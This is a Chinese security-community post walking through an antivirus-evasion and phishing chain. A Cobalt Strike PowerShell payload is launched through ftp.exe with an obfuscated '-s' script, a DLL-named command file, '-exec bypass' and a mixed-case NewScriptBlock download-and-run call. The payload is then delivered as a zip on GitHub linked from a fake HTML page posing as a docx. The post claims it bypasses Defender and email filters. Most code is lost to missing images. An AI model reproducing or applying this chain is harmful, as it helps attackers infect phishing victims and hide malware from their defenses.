FTP免杀绕过杀软及钓鱼绕过邮箱检测-先知社区

FTP免杀Bypass杀软

CS服务端制作远程恶意ps1文件

CS服务端启动

然后客户端连上，然后建立监听器，之后生成powershell恶意文件

图片加载失败

a.ps1文件内容如下

制作恶意ftp命令执行

注意需要将起始位置置空，然后目标写入

-""s:aaa.dll

：

○

这部分是传递给

ftp.exe

的参数。

○

-s

是

ftp.exe

的一个标准参数，用于指定一个包含 FTP 命令的脚本文件。

○

是空字符串，是为了绕过某些安全检查或混淆命令。

○

good.dll` 是一个动态链接库文件（DLL），通常用于扩展程序功能。

图片加载失败

good.dll内容如下，原理是ftp命令模式下，输入

会命令执行

这是一种混淆的写法：

●

是转义字符，用于绕过简单的字符串检测

●

-exec bypass

是 PowerShell 的一个参数，用于绕过执行策略（Execution Policy），允许运行脚本。

●

.\\bad.ps1

：

○

这是要执行的 PowerShell 脚本文件路径，表示当前目录下的

bad.ps1

文件。

图片加载失败

然后bad.ps1 写入powershell命令

●

○

$ExeCuTiOnCoNtExT.InvOkeCoMmAnD.NeWScriPtBlOcK(...)

：创建一个新的脚本块并执行。

●

从指定 URL 下载内容并执行powershell脚本。

其中a文件是之前CS生产的powersshell命令文件，改一下名字就好了

只要打开快捷键，CS这边就会立刻上线

图片加载失败

注：用此方法可过所有静态查杀，动态的查杀像360杀毒，win defender可绕过，国内某些杀软比如火绒一调用powershell进程就报可疑

整体文件夹如下

图片加载失败

打包为zip上传到github复制下载链接，插入到伪造的html页面中的下载url中

通过html页面伪装为查杀后的docx文件，实际链接是木马下载地址

实际编辑的可视化效果如下图

图片加载失败

实际测试成功绕过邮箱检测发送给收件人，收件效果如下

图片加载失败